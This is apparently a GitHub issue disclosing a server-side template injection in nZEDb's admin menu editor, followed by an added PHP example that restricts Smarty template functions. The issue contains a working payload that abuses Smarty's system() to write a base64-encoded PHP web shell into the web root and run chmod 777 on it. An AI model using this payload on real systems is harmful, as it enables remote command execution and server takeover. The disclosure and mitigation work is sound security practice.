
SSTI Vulnerability in Admin Menu Add #2662

Open
@cruatta

Description

There is a Server Side Template Injection in /admin/menu-edit.php?action=submit, which I'd like to discuss with the community to try and figure out a solution for.

Background

  • As an admin nZEDb user, I can add a menu item to an installation of nZEDb by navigating from:
    Home Page -> Admin Panel -> Site Settings -> Menu Items -> Add

And then add to the Evaluate field a Smarty expression which triggers code execution on the server:

{system('echo PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz4= | base64 -d > /var/www/nZEDb/www/admin/shell.php && chmod 777 /var/www/nZEDb/www/admin/shell.php')}

The above payload drops an example web shell for further exploitation.

Expected behaviour

  • The Evaluate field is meant to determine if a menu is visible or not. Adding a menu as an admin user should likely not allow you to use Smarty template functions like system() which run arbitrary system commands by design. I understand this might be up for some discussion.

Actual behaviour

  • It appears there is no filtering of the functions of the template engine when adding a new menu item. This lets an nZEDb admin user without the ability to run code on the server run arbitrary commands as the user running PHP on the web server.

Steps to reproduce the behaviour

I have created a PoC to demonstrate this along with another vulnerability, which was just patched (#2661):

https://gitlab.com/cruatta/nzedb-pwn
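The kind of restriction the report asks about, as an added example that is not nZEDb's or Smarty's own code and is not part of the issue above: the Evaluate fragment is rendered under a `Smarty_Security` policy whose PHP function allowlist does not include `system()`, so the payload fails at template compile time instead of executing. It assumes Smarty 3.1 installed via Composer (`vendor/autoload.php`); the page does not show how nZEDb actually renders the Evaluate field, so fetching it as a `string:` template and treating non-empty output as "visible" is an assumption, and the names `MenuEvaluatePolicy` and `menuIsVisible` are hypothetical.

```php
<?php
// Added example, not code from nZEDb or from this issue: evaluate an admin-supplied
// Smarty "Evaluate" fragment under a Smarty_Security policy so that PHP function
// calls such as {system(...)} are refused at compile time instead of executed.
// Assumptions: Smarty 3.1 via Composer; how nZEDb itself renders the Evaluate
// field is not shown on the page, so the string-template rendering here and the
// names MenuEvaluatePolicy / menuIsVisible are hypothetical.

require __DIR__ . '/vendor/autoload.php';

class MenuEvaluatePolicy extends Smarty_Security
{
    // With security enabled, Smarty only lets templates call PHP functions
    // listed here; system, exec, passthru, file_put_contents, ... are absent.
    public $php_functions = ['isset', 'empty', 'count', 'in_array', 'is_array'];
    // Unregistered modifiers fall back to PHP functions ({$x|system} would also
    // run a command), so they get the same allowlist treatment.
    public $php_modifiers = ['escape', 'count', 'lower', 'upper'];
    public $static_classes = [];           // no Class::method() from a template
    public $streams = [];                  // no stream wrappers in {include}/{fetch}
    public $allow_constants = false;
    public $allow_super_globals = false;   // no {$smarty.server.*} and friends
    public $disabled_tags = ['include', 'include_php', 'php', 'eval', 'fetch'];
}

function menuIsVisible(string $evaluate, array $vars): bool
{
    // Empty field: menu is unconditionally visible (assumed semantics).
    if (trim($evaluate) === '') {
        return true;
    }

    $smarty = new Smarty();
    $compileDir = sys_get_temp_dir() . '/menu_eval_compile';
    @mkdir($compileDir, 0700, true);
    $smarty->setCompileDir($compileDir);
    $smarty->enableSecurity('MenuEvaluatePolicy');
    $smarty->assign($vars);

    try {
        $out = trim($smarty->fetch('string:' . $evaluate));
    } catch (SmartyException $e) {
        // Policy violation (SmartyCompilerException) or any other template
        // error: fail closed and hide the menu rather than rendering anything.
        error_log('menu Evaluate rejected: ' . $e->getMessage());
        return false;
    }
    return $out !== '' && $out !== '0';
}

// Constructed inputs: a benign visibility condition, and a harmless probe
// standing in for the report's web-shell payload.
$vars = ['isAdmin' => true];
var_dump(menuIsVisible('{if $isAdmin}1{/if}', $vars));
var_dump(menuIsVisible("{system('id')}", $vars));
```

Under the policy the second call logs a "not allowed by security setting" style compile error and returns false; the first renders normally. Even so, the Evaluate field remains server-side template code written by an admin, so the policy limits the blast radius rather than removing the trust decision the report says is up for discussion.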
